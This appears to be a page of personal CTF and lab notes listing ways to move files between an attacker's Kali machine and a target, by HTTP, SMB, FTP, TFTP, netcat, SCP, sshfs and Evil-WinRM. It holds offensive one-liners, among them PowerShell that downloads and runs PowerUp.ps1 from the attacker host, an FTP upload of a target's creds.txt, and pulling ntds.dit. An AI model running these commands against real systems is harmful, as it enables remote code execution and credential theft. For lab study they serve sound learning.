# File Transfer ### HTTP {% code overflow="wrap" %} ```bash # HTTP Server # Python module python2 -m SimpleHTTPServer 80 python3 -m http.server 80 # pip install updog # https://github.com/sc0tfree/updog # This has an upload function updog 80 # HTTP client wget http:/// curl http:/// --output # Certutil certutil -urlcache -split -f http:/// # Powershell PS>Invoke-WebRequest -URI http:/// -OutFile C:\Users\Cortin\ PS>(New-Object Net.WebClient).DownloadString('http://<10.10.14.8/PowerUp.ps1') CMD>powershell -c iex(New-Object Net.WebClient).DownloadString('http://<10.10.14.8/PowerUp.ps1') PS>Import-Module BitsTransfer; Start-BitsTransfer -Source http://192.168.119.128/target.txt -Destination . ``` {% endcode %} ### SMB {% code overflow="wrap" %} ```bash # -- SMB v2 server -- # Simplified version # Kali sudo impacket-smbserver smb $(pwd) -smb2support -user iptracej -password iptracej # Target iex (new-Object Net.WebClient).DownloadString('http://10.10.14.4/privesc/SMB2.ps1'); SMB2 -IPAddress 10.10.14.4 # Manual version # Kali sudo impacket-smbserver smb $(pwd) -smb2support -user user -password password # Target $pass = convertto-securestring 'user' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('user', $pass) New-PSDrive -Name kali -PSProvider FileSystem -Credential $cred -Root \\\smb # -- SMB v1 server -- # Kali sudo impacket-smbserver smb . # Target \\\smb ``` {% endcode %} ### FTP {% code overflow="wrap" %} ```bash # python ftp module # sudo apt-get install python3-pyftpdlib sudo python3 -m pyftpdlib -p 21 -w # Linux target ftp # Windows target # Binary file $client = New-Object System.Net.WebClient $client.Credentials = New-Object System.Net.NetworkCredential("anonymous", "anonymous") $client.UploadFile("ftp://192.168.119.128/creds.txt", "C:\inetpub\wwwroot\creds.txt") # ASCII # Should be 5 or later $psversiontable Compress-Archive -Path C:\inetpub\wwwroot\creds.txt -DestinationPath C:\inetpub\wwwroot\creds.txt.zip $client = New-Object System.Net.WebClient $client.Credentials = New-Object System.Net.NetworkCredential("anonymous","anonymous") $client.UploadFile("ftp://192.168.119.128/creds.txt.zip", "C:\inetpub\wwwroot\creds.txt.zip") ``` {% endcode %} ### TFTP {% code overflow="wrap" %} ```bash # Very old UDP based File transfer protocol. By default, it is installed on Windows machines up to Windows XP and 2003. # https://www.linux.com/topic/networking/trivial-transfers-tftp-part-3-usage/ # Kail # apt-get install tftp mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/ /tftp/ # Windows XP and 2003 tftp 10.10.10.10 tftp> status tftp> verbose tftp> binary tftp> get HERE_I_AM ``` {% endcode %} ### Netcat 
# Reciver 
nc -l -p 1235 > nineveh.png

# Sender
nc -w 3 10.10.14.3 1235 < nineveh.png
### SCP ```bash scp /path/to/source/file.ext username@x.x.x.x scp -r /path/to/source/dir username@x.x.x.x # Kali sudo systemctl start ssh sudo mkdir /mnt/dropplet # Target scp -r /mnt/opt/* iptracej@:/mnt/dropplet ``` ### sshfs mount the file system via ssh {% code overflow="wrap" %} ```bash # Target sudo systemctl start ssh sudo systemctl status ssh # Kali sudo apt install sshfs # create a mount point sudo mkdir /mnt/droplet # Ensure you are not in /mnt/droplet cd ~ # connect to remote system and mount the location sudo sshfs -o allow_other,default_permissions iptracej@:/var/www/html /mnt/droplet ``` {% endcode %} Evil-winrm ```bash Evil-WinRM* PS C:\temp> download Evil-WinRM* PS C:\temp> download C:\temp\ntds.dit /home/iptracej/htb/Monteverde/download/ntds.dit Evil-WinRM* PS C:\temp> upload Evil-WinRM* PS C:\temp> upload nc.exe ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/file-transfer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.